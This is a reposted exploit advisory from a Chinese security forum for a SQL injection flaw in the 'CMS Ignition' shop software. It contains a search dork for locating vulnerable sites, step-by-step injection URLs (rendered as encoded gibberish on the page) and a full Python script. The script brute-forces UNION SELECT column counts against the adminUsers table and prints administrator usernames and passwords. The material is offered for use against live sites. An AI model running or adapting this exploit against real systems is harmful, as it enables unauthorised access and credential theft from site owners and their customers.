[转帖]CMS Ignition SQL Injection Exploit-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[转帖]CMS Ignition SQL Injection Exploit
发表于: 2010-7-26 13:24 4394
[转帖]CMS Ignition SQL Injection Exploit

freebsdlin 活跃值
2010-7-26 13:24
4394
[+] SQL Injection Vulnerability  

[+] Dorks: allinurl:"shop.htm?shopMGID="  

[+] Bug in shop.htm?shopMGID  

[+] Exploit: 4a0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9r3!0H3i4K6u0W2K9s2c8E0i4K6y4r3M7$3S2G2M7p5#2s2d9f1c8Q4x3@1c8j5h3q4S2j5 (see below python exploit)  

[+]   

==================================================  

   

Step[1]:  

Error  

4b8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9r3!0H3i4K6u0W2K9s2c8E0i4K6y4r3M7$3S2G2M7p5#2s2d9f1c8Q4x3@1b7&6z5e0V1&6i4K6t1%4  

   

Step[2]:  

Number of columns  

aa5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9r3!0H3i4K6u0W2K9s2c8E0i4K6y4r3M7$3S2G2M7p5#2s2d9f1c8Q4x3@1b7&6z5e0V1&6i4K6u0n7L8%4u0V1k6i4u0Q4x3V1u0T1P5g2)9J5b7U0q4Q4x3X3c8Q4x3X3b7`.  

   

Step[3]:  

Output of numbers  

efeK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9r3!0H3i4K6u0W2K9s2c8E0i4K6y4r3M7$3S2G2M7p5#2s2d9f1c8Q4x3@1c8Q4x3X3b7&6z5e0V1&6i4K6u0n7N6h3&6A6L8$3&6Q4x3V1u0K6k6h3I4W2j5%4c8Q4x3V1t1I4i4K6u0o6x3W2)9J5b7K6y4Q4x3V1x3@1i4K6u0o6y4g2)9J5k6q4)9J5k6l9`.`.  

   

Step[4]:  

Collect informations  

1ebK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9r3!0H3i4K6u0W2K9s2c8E0i4K6y4r3M7$3S2G2M7p5#2s2d9f1c8Q4x3@1c8Q4x3X3b7&6z5e0V1&6i4K6u0n7N6h3&6A6L8$3&6Q4x3V1u0K6k6h3I4W2j5%4c8Q4x3V1u0$3k6i4u0K6K9h3!0F1i4K6t1^5i4K6t1&6i4K6u0o6k6r3q4@1j5h3u0S2M7$3g2Q4x3U0S2Q4x3U0W2Q4x3V1x3K6i4K6u0o6y4q4)9J5b7K6g2Q4x3V1u0X3M7X3!0E0i4K6u0n7K9h3&6X3L8%4u0E0j5i4c8A6L8$3&6Q4y4h3k6K6j5$3S2W2L8h3q4Q4x3X3g2U0L8$3I4#2L8h3&6K6i4K6u0V1i4K6u0V1  

   

Step[5]:  

If version is  

5.0.67-community  

5.0.32-Debian_7etch8-log  

5.0.40-log  

5c8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9r3!0H3i4K6u0W2K9s2c8E0i4K6y4r3M7$3S2G2M7p5#2s2d9f1c8Q4x3@1c8Q4x3X3b7&6z5e0V1&6i4K6u0n7N6h3&6A6L8$3&6Q4x3V1u0K6k6h3I4W2j5%4c8Q4x3V1t1I4i4K6u0o6x3W2)9J5b7$3y4G2L8X3y4S2N6q4)9#2k6Y4N6K6i4K6t1^5x3s2R3K6j5g2)9J5b7%4c8S2j5X3I4W2i4K6g2X3M7$3y4Z5k6h3#2S2i4K6u0o6N6r3q4T1L8r3g2Q4y4h3k6F1j5h3#2W2i4K6u0o6j5$3!0D9N6h3#2F1i4K6g2X3L8X3q4E0k6g2)9J5z5g2)9J5b7K6c8Q4x3V1x3#2i4K6u0n7k6Y4u0G2L8g2)9J5b7X3W2F1k6X3!0J5L8h3q4@1K9h3!0F1i4K6g2X3M7$3y4Z5k6h3#2S2i4K6u0W2j5$3!0D9N6h3#2F1M7#2)9J5k6q4)9J5k6l9`.`.  

   

Step[6]:  

Increment zero in "limit+0,1--" until you have interesting tables and columns  

cbcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9r3!0H3i4K6u0W2K9s2c8E0i4K6y4r3M7$3S2G2M7p5#2s2d9f1c8Q4x3@1c8Q4x3X3b7&6z5e0V1&6i4K6u0n7N6h3&6A6L8$3&6Q4x3V1u0K6k6h3I4W2j5%4c8Q4x3V1t1I4i4K6u0o6x3W2)9J5b7$3y4G2L8X3y4S2N6q4)9#2k6Y4N6K6i4K6t1^5x3s2R3K6j5g2)9J5b7%4c8S2j5X3I4W2i4K6g2X3M7$3y4Z5k6h3#2S2i4K6u0o6N6r3q4T1L8r3g2Q4y4h3k6F1j5h3#2W2i4K6u0o6j5$3!0D9N6h3#2F1i4K6g2X3L8X3q4E0k6g2)9J5z5g2)9J5b7K6c8Q4x3V1x3#2i4K6u0n7k6Y4u0G2L8g2)9J5b7X3W2F1k6X3!0J5L8h3q4@1K9h3!0F1i4K6g2X3M7$3y4Z5k6h3#2S2i4K6u0W2j5$3!0D9N6h3#2F1M7#2)9J5b7X3I4A6L8h3W2@1i4K6u0n7x3q4)9J5b7K6q4Q4x3X3c8Q4x3X3b7`.  

   

Step[7]:  

Get the content  

(fiction tables in this example)  

37fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9r3!0H3i4K6u0W2K9s2c8E0i4K6y4r3M7$3S2G2M7p5#2s2d9f1c8Q4x3@1c8Q4x3X3b7&6z5e0V1&6i4K6u0n7N6h3&6A6L8$3&6Q4x3V1u0K6k6h3I4W2j5%4c8Q4x3V1t1I4i4K6u0o6x3W2)9J5b7$3y4G2L8X3y4S2N6q4)9#2k6Y4N6K6i4K6t1^5x3s2R3K6j5g2)9J5b7%4g2K6k6i4u0F1j5h3#2W2i4K6u0o6M7r3q4K6M7%4N6G2M7X3c8Q4x3U0W2Q4x3V1x3@1i4K6u0o6y4g2)9J5b7Y4g2K6k6i4u0Q4x3X3c8Q4x3X3b7`.  

   

==================================================  

   

[+] Contact:  

    - neavorc[at]gmail.com  

   

==================================================  

Discovered by NEAVORC  

Cheers'n'Oi  

   

==================================================  

   

# Exploit Title:    CMS Ignition SQL Injection  

# Date:         25/08/2010  [DD:MM:JJJJ]  

# Author:       NEAVORC  

# Software Link:    b17K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3k6A6L8X3g2Y4M7X3q4X3K9i4S2Q4x3X3g2U0L8#2)9J5k6i4A6S2i4K6u0r3  

#           0f6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3k6A6L8X3g2Y4M7X3q4X3K9i4S2Q4x3X3g2U0L8#2)9J5k6i4A6S2i4K6u0r3j5$3#2K6K9h3N6F1K9i4c8A6L8$3&6Q4x3X3g2Z5N6r3@1`.  

# Dork:         Dorks: allinurl:"shop.htm?shopMGID="      

   

import urllib ,sys,os   

if len(sys.argv)!=2:  

    os.system('cls')  

    os.system('clear')  

    print "==============================================================================="  

    print "==============   CMSignition Exploit  ||| NEAVORC[@]gmail[.]com ==============="  

    print "==============================================================================="  

    print "== Take the Admin username and the password from the tagrt page              =="  

    print "=Usage: ./exploit.py <injection>                                             =="  

    print "=Exmpl: ./exploit.py <a0eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6K6K9r3!0H3i4K6u0W2K9s2c8E0i4K6y4r3M7$3S2G2M7p5#2s2d9f1c8Q4x3@1b7I4x3K6q4Q4x3U0k6Y4N6q4)9K6b7R3`.`.  =="  

    print "==============================================================================="  

    sys.exit(1)  

global url,end,injection,i    

url = sys.argv[1]  

url = url.replace("=","=-")  

end = "+from+adminUsers--"  

injection = "+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,0x6F7574707574,username,password,0x6861636B6564),22,23,24,25,26,27,28,29,"  

os.system('cls')  

print "==============================================================================="  

print "=================   SQLi   Exploit  ||| NEAVORC[@]gmail[.]com ================="  

print "==============================================================================="  

print "==                         Exploiting Please wait...                         =="  

print "==============================================================================="  

   

if url[:7] != "http://":  

    print "Url correction...."  

    url = "http://"+url  

    print "To : "+url  

try:  

    i = 30  

    while i <=70:  

        global full_inj  

        injection = injection+str(i)+","  

        full_inj = url+injection[:-1]+end  

        f = urllib.urlopen(full_inj)  

        s = f.read()  

        if "output:" in s:  

            begin = int(s.find("output"))  

            end = int(s.find("hacked"))  

            columns = full_inj[-20:-18]  

            os.system('cls')  

            
            print "=================   Administrator: "+s[begin:end-1]  

            print "=================   Columns: "+columns  

            
        i = i+1   

except(TypeError):  

    exit
[培训]科锐逆向工程师培训第53期2025年7月8日开班！
收藏・1
免费・0
支持
最新回复 (1)
nw无解雪币： 1 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	nw无解 2 楼 2017-8-22 21:43 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复
freebsdlin
243
发帖
355
回帖
RANK
关注
私信
他的文章
关于我们
联系我们
企业服务
看雪公众号